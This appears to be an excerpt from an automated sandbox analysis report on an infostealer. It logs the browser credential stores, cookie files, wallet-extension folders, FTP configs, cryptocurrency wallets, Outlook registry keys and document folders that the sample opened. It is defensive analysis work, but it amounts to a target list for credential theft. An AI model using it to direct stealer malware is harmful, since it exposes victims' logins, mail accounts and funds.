Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Searches for user specific document files
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
